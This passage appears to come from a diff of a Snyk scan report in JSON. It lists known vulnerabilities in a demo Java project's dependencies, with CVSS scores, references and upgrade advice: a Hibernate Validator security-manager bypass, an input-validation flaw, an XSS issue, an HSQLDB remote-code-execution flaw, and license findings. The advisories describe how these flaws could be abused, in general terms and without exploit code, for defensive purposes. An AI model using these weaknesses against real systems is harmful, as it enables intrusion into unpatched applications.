- "CWE-89" - ] - }, - "packageName": "org.hibernate:hibernate-core", - "proprietary": false, - "creationTime": "2020-07-15T13:53:15.331818Z", - "functions_new": [ - { - "version": [ - "[5.1.18.Final ,5.4.18.Final)" - ], - "functionId": { - "className": "org.hibernate.query.criteria.internal.expression.LiteralExpression", - "functionName": "renderProjection" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-06-18T13:46:30Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.hibernate", - "artifactId": "hibernate-core" - }, - "publicationTime": "2020-07-15T16:40:12Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:49.262550Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "org.hibernate:hibernate-core", - "version": "4.3.7.Final", - "severityWithCritical": "high" - }, - { - "id": "snyk:lic:maven:org.hibernate:hibernate-core:LGPL-2.0", - "type": "license", - "title": "LGPL-2.0 license", - "semver": { - "vulnerable": [ - "[3.3.0.CR1, 5.3.1.Final)" - ] - }, - "license": "LGPL-2.0", - "language": "java", - "description": "LGPL-2.0 license", - "packageName": "org.hibernate:hibernate-core", - "creationTime": "2024-06-18T19:09:16.096Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T19:09:16.096Z", - "severity": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "org.hibernate:hibernate-core", - "version": "4.3.7.Final", - "severityWithCritical": "medium" - }, - { - "id": "SNYK-JAVA-ORGHIBERNATE-30098", - "title": "JSM bypass via ReflectionHelper", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[4.1.0.Beta1, 4.3.2.Final)", - "[5.0.0.Final,5.1.2.Final)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "4.3.2.Final", - "5.1.2.Final" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.hibernate:hibernate-validator", - "references": [ - { - "url": "https://github.com/hibernate/hibernate-validator/commit/2c95d4ea0ef20977be249e31a4a4f4f4f71c945d", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/hibernate/hibernate-validator/commit/67fdff14831c035c25e098fe14bd86523d17f726", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/hibernate/hibernate-validator/commit/7e7131939a4361a7cad3e77ab89a8462132c561c", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/hibernate/hibernate-validator/commit/c489416f699a46859c134796b3ccfea41ef3ce52", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/hibernate/hibernate-validator/commit/c9525ca544b1281e2b7c7347e86e87c86dc1dc6e", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/hibernate/hibernate-validator/commit/e8c42b689df8c6752d635d02c6518da3fece3870", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/hibernate/hibernate-validator/commit/f97c2021a03c825abdeca1692f5be51e77e76a8f", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/hibernate/hibernate-validator/commit/fd4eaed7fb930db6a5e4c03742b4b3adcfecc90e", - "title": "GitHub Commit" - }, - { - "url": "https://hibernate.atlassian.net/browse/HV-912", - "title": "Jira Issue" - }, - { - "url": "https://bugzilla.redhat.com/CVE-2014-3558", - "title": "Redhat Bugzilla" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:46:09.119807Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", - "cvssV3BaseScore": 4.4, - "modificationTime": "2024-03-11T09:48:45.778673Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:01:48.734535Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:46:09.119807Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 4.4, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:45.778673Z" - } - ], - "description": "## Overview\n[org.hibernate:hibernate-validator](https://mvnrepository.com/artifact/org.hibernate/hibernate-validator) is a Hibernate Validator Engine Relocation Artifact.\n\nAffected versions of this package are vulnerable to JSM bypass via ReflectionHelper. ReflectionHelper (`org.hibernate.validator.util.ReflectionHelper`) in Hibernate Validator 4.1.0 before 4.2.1, 4.3.x before 4.3.2, and 5.x before 5.1.2 allows attackers to bypass Java Security Manager (JSM) restrictions and execute restricted reflection calls via a crafted application.\n## Remediation\nUpgrade `org.hibernate:hibernate-validator` to version 4.3.2.Final, 5.1.2.Final or higher.\n## References\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/2c95d4ea0ef20977be249e31a4a4f4f4f71c945d)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/67fdff14831c035c25e098fe14bd86523d17f726)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/7e7131939a4361a7cad3e77ab89a8462132c561c)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/c489416f699a46859c134796b3ccfea41ef3ce52)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/c9525ca544b1281e2b7c7347e86e87c86dc1dc6e)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/e8c42b689df8c6752d635d02c6518da3fece3870)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/f97c2021a03c825abdeca1692f5be51e77e76a8f)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/fd4eaed7fb930db6a5e4c03742b4b3adcfecc90e)\n- [Jira Issue](https://hibernate.atlassian.net/browse/HV-912)\n- [Redhat Bugzilla](https://bugzilla.redhat.com/CVE-2014-3558)\n", - "epssDetails": { - "percentile": "0.70800", - "probability": "0.00319", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2014-3558" - ], - "CWE": [ - "CWE-592" - ] - }, - "packageName": "org.hibernate:hibernate-validator", - "proprietary": false, - "creationTime": "2016-12-25T16:51:53Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2014-07-17T16:51:53Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.hibernate", - "artifactId": "hibernate-validator" - }, - "publicationTime": "2014-07-17T16:51:53Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:48:45.778673Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-validator@4.3.1.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "org.hibernate:hibernate-validator", - "version": "4.3.1.Final", - "severityWithCritical": "medium" - }, - { - "id": "SNYK-JAVA-ORGHIBERNATE-568162", - "title": "Improper Input Validation", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "credit": [ - "Alvaro Muñoz" - ], - "semver": { - "vulnerable": [ - "[,6.0.19.Final)", - "[6.1.0,6.1.3.Final)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "6.0.19.Final", - "6.1.3.Final" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [ - { - "version": [ - "[,6.0.19.Final)", - "[6.1.0,6.1.3.Final)" - ], - "functionId": { - "filePath": "org/hibernate/validator/internal/engine/ValidatorImpl.java", - "className": "ValidatorImpl", - "functionName": "validate" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "org.hibernate:hibernate-validator", - "references": [ - { - "url": "https://github.com/hibernate/hibernate-validator/pull/1071", - "title": "GitHub PR" - }, - { - "url": "https://hibernate.atlassian.net/browse/HV-1758", - "title": "Jira Issue" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1805501", - "title": "RedHat Bugzilla Bug" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:50:18.797394Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:54:00.490090Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:37.379564Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:18.797394Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:54:00.490090Z" - } - ], - "description": "## Overview\n[org.hibernate:hibernate-validator](https://mvnrepository.com/artifact/org.hibernate/hibernate-validator) is a Hibernate Validator Engine Relocation Artifact.\n\nAffected versions of this package are vulnerable to Improper Input Validation. A bug in the message interpolation processor enables invalid EL expressions to be evaluated as if they were valid. This flaw allows attackers to bypass input sanitation (escaping, stripping) controls that developers may have put in place when handling user-controlled data in error messages.\n## Remediation\nUpgrade `org.hibernate:hibernate-validator` to version 6.0.19.Final, 6.1.3.Final or higher.\n## References\n- [GitHub PR](https://github.com/hibernate/hibernate-validator/pull/1071)\n- [Jira Issue](https://hibernate.atlassian.net/browse/HV-1758)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1805501)\n", - "epssDetails": { - "percentile": "0.49937", - "probability": "0.00139", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-10693" - ], - "CWE": [ - "CWE-20" - ], - "GHSA": [ - "GHSA-rmrm-75hp-phr2" - ] - }, - "packageName": "org.hibernate:hibernate-validator", - "proprietary": false, - "creationTime": "2020-05-05T12:05:58.541980Z", - "functions_new": [ - { - "version": [ - "[,6.0.19.Final)", - "[6.1.0,6.1.3.Final)" - ], - "functionId": { - "className": "org.hibernate.validator.internal.engine.ValidatorImpl", - "functionName": "validate" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-05-05T00:00:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.hibernate", - "artifactId": "hibernate-validator" - }, - "publicationTime": "2020-05-05T16:32:46Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:54:00.490090Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-validator@4.3.1.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "org.hibernate:hibernate-validator", - "version": "4.3.1.Final", - "severityWithCritical": "medium" - }, - { - "id": "SNYK-JAVA-ORGHIBERNATE-569100", - "title": "Cross-site Scripting (XSS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N/E:U/RL:O/RC:R", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,6.0.18.Final)", - "[6.1.0.Alpha1,6.1.0.Final)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "6.0.18.Final", - "6.1.0.Final" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 6.5, - "functions": [ - { - "version": [ - "[,6.0.18.Final)", - "[6.1.0.Alpha1,6.1.0.Final)" - ], - "functionId": { - "filePath": "org/hibernate/validator/internal/constraintvalidators/hv/SafeHtmlValidator.java", - "className": "SafeHtmlValidator", - "functionName": "getFragmentAsDocument" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "org.hibernate:hibernate-validator", - "references": [ - { - "url": "https://lists.apache.org/thread.html/r87b7e2d22982b4ca9f88f5f4f22a19b394d2662415b233582ed22ebf@%3Cnotifications.accumulo.apache.org%3E", - "title": "Apache Security Advisory" - }, - { - "url": "https://github.com/hibernate/hibernate-validator/commit/124b7dd6d9a4ad24d4d49f74701f05a13e56ceee", - "title": "GitHub Commit" - }, - { - "url": "https://in.relation.to/2019/11/20/hibernate-validator-610-6018-released/", - "title": "Hibernator Security Release Blog" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-10219", - "title": "RedHat Bugzilla Bug" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", - "cvssV3BaseScore": 6.1, - "modificationTime": "2024-03-11T09:51:34.418099Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", - "cvssV3BaseScore": 6.5, - "modificationTime": "2024-03-11T09:54:00.455389Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N/E:U/RL:O/RC:R", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:01:47.749976Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 6.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:34.418099Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:54:00.455389Z" - } - ], - "description": "## Overview\n[org.hibernate:hibernate-validator](https://mvnrepository.com/artifact/org.hibernate/hibernate-validator) is a Hibernate Validator Engine Relocation Artifact.\n\nAffected versions of this package are vulnerable to Cross-site Scripting (XSS). The `SafeHtml` validator annotation fails to properly sanitize payloads consisting of potentially malicious code in HTML comments and instructions.\n## Details\n\nA cross-site scripting attack occurs when the attacker tricks a legitimate web-based application or site to accept a request as originating from a trusted source.\n\nThis is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.\n\nInjecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.\n\nEscaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, `<` can be coded as `<`; and `>` can be coded as `>`; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses `<` and `>` as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.\n \nThe most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware. \n\n### Types of attacks\nThere are a few methods by which XSS can be manipulated:\n\n|Type|Origin|Description|\n|--|--|--|\n|**Stored**|Server|The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.|\n|**Reflected**|Server|The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.| \n|**DOM-based**|Client|The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.|\n|**Mutated**| |The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.|\n\n### Affected environments\nThe following environments are susceptible to an XSS attack:\n\n* Web servers\n* Application servers\n* Web application environments\n\n### How to prevent\nThis section describes the top best practices designed to specifically protect your code: \n\n* Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches. \n* Convert special characters such as `?`, `&`, `/`, `<`, `>` and spaces to their respective HTML or URL encoded equivalents. \n* Give users the option to disable client-side scripts.\n* Redirect invalid requests.\n* Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.\n* Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.\n* Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.\n\n## Remediation\nUpgrade `org.hibernate:hibernate-validator` to version 6.0.18.Final, 6.1.0.Final or higher.\n## References\n- [Apache Security Advisory](https://lists.apache.org/thread.html/r87b7e2d22982b4ca9f88f5f4f22a19b394d2662415b233582ed22ebf@%3Cnotifications.accumulo.apache.org%3E)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/124b7dd6d9a4ad24d4d49f74701f05a13e56ceee)\n- [Hibernator Security Release Blog](https://in.relation.to/2019/11/20/hibernate-validator-610-6018-released/)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-10219)\n", - "epssDetails": { - "percentile": "0.61710", - "probability": "0.00232", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-10219" - ], - "CWE": [ - "CWE-79" - ] - }, - "packageName": "org.hibernate:hibernate-validator", - "proprietary": false, - "creationTime": "2020-05-14T16:07:06.897969Z", - "functions_new": [ - { - "version": [ - "[,6.0.18.Final)", - "[6.1.0.Alpha1,6.1.0.Final)" - ], - "functionId": { - "className": "org.hibernate.validator.internal.constraintvalidators.hv.SafeHtmlValidator", - "functionName": "getFragmentAsDocument" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-10-18T14:55:21Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.hibernate", - "artifactId": "hibernate-validator" - }, - "publicationTime": "2020-01-09T14:55:12Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:54:00.455389Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-validator@4.3.1.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "org.hibernate:hibernate-validator", - "version": "4.3.1.Final", - "severityWithCritical": "medium" - }, - { - "id": "SNYK-JAVA-ORGHSQLDB-3040860", - "title": "Remote Code Execution (RCE)", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H", - "credit": [ - "OSS Fuzz Team" - ], - "semver": { - "vulnerable": [ - "[,2.7.1)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.7.1" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.hsqldb:hsqldb", - "references": [ - { - "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50212%23c7", - "title": "Chromium Bugs" - }, - { - "url": "https://github.com/ryenus/hsqldb/commit/b6719c67b41eb9298c2451ad2829bf03b262a941", - "title": "GitHub Commit" - }, - { - "url": "http://hsqldb.org/doc/2.0/guide/sqlroutines-chapt.html%23src_jrt_access_control", - "title": "Mitigation" - }, - { - "url": "https://sourceforge.net/p/hsqldb/svn/6614/tree//base/trunk/src/org/hsqldb/persist/HsqlDatabaseProperties.java", - "title": "SVN Commit" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:51:53.988304Z" - }, - { - "assigner": "Red Hat", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:53:59.414572Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:05:55.045961Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:53.988304Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:59.414572Z" - } - ], - "description": "## Overview\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE) when using `java.sql.Statement` or `java.sql.PreparedStatement` to process untrusted input. By default, it is allowed to call any static method of any Java class in the classpath resulting in code execution.\n\n## Workaround\nUsers who are unable to upgrade to the fixed version can set the system property `hsqldb.method_class_names` to classes which are allowed to be called. For example, `System.setProperty(\"hsqldb.method_class_names\", \"abc\")` or Java argument `-Dhsqldb.method_class_names=\"abc\"` can be used.\n## Remediation\nUpgrade `org.hsqldb:hsqldb` to version 2.7.1 or higher.\n## References\n- [Chromium Bugs](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50212#c7)\n- [GitHub Commit](https://github.com/ryenus/hsqldb/commit/b6719c67b41eb9298c2451ad2829bf03b262a941)\n- [Mitigation](http://hsqldb.org/doc/2.0/guide/sqlroutines-chapt.html#src_jrt_access_control)\n- [SVN Commit](https://sourceforge.net/p/hsqldb/svn/6614/tree//base/trunk/src/org/hsqldb/persist/HsqlDatabaseProperties.java)\n", - "epssDetails": { - "percentile": "0.85801", - "probability": "0.01274", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2022-41853" - ], - "CWE": [ - "CWE-94" - ], - "GHSA": [ - "GHSA-77xx-rxvh-q682" - ] - }, - "packageName": "org.hsqldb:hsqldb", - "proprietary": false, - "creationTime": "2022-10-07T07:26:42.276748Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2022-10-06T18:52:05Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.hsqldb", - "artifactId": "hsqldb" - }, - "publicationTime": "2022-10-07T07:26:42.515068Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:59.414572Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hsqldb:hsqldb@2.3.2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "org.hsqldb:hsqldb", - "version": "2.3.2", - "severityWithCritical": "high" - }, - { - "id": "snyk:lic:maven:org.aspectj:aspectjweaver:EPL-1.0", - "type": "license", - "title": "EPL-1.0 license", - "semver": { - "vulnerable": [ - "[1.5.4,)" - ] - }, - "license": "EPL-1.0", - "language": "java", - "description": "EPL-1.0 license", - "packageName": "org.aspectj:aspectjweaver", - "creationTime": "2024-06-18T21:24:04.112Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T21:24:04.112Z", - "severity": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.aspectj:aspectjweaver@1.8.2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "org.aspectj:aspectjweaver", - "version": "1.8.2", - "severityWithCritical": "medium" - }, - { - "id": "snyk:lic:maven:org.hibernate.common:hibernate-commons-annotations:LGPL-2.1", - "type": "license", - "title": "LGPL-2.1 license", - "semver": { - "vulnerable": [ - "[4.0.0.CR1,)" - ] - }, - "license": "LGPL-2.1", - "language": "java", - "description": "LGPL-2.1 license", - "packageName": "org.hibernate.common:hibernate-commons-annotations", - "creationTime": "2024-06-18T11:03:46.980Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T11:03:46.980Z", - "severity": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final", - "org.hibernate.common:hibernate-commons-annotations@4.0.5.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "org.hibernate.common:hibernate-commons-annotations", - "version": "4.0.5.Final", - "severityWithCritical": "medium" - }, - { - "id": "snyk:lic:maven:org.hibernate.javax.persistence:hibernate-jpa-2.1-api:EPL-1.0", - "type": "license", - "title": "EPL-1.0 license", - "semver": { - "vulnerable": [ - "[1.0.0.Final,)" - ] - }, - "license": "EPL-1.0", - "language": "java", - "description": "EPL-1.0 license", - "packageName": "org.hibernate.javax.persistence:hibernate-jpa-2.1-api", - "creationTime": "2024-06-18T12:03:42.953Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T12:03:42.953Z", - "severity": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final", - "org.hibernate.javax.persistence:hibernate-jpa-2.1-api@1.0.0.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "org.hibernate.javax.persistence:hibernate-jpa-2.1-api", - "version": "1.0.0.Final", - "severityWithCritical": "medium" - }, - { - "id": "snyk:lic:maven:org.hibernate:hibernate-entitymanager:LGPL-2.0", - "type": "license", - "title": "LGPL-2.0 license", - "semver": { - "vulnerable": 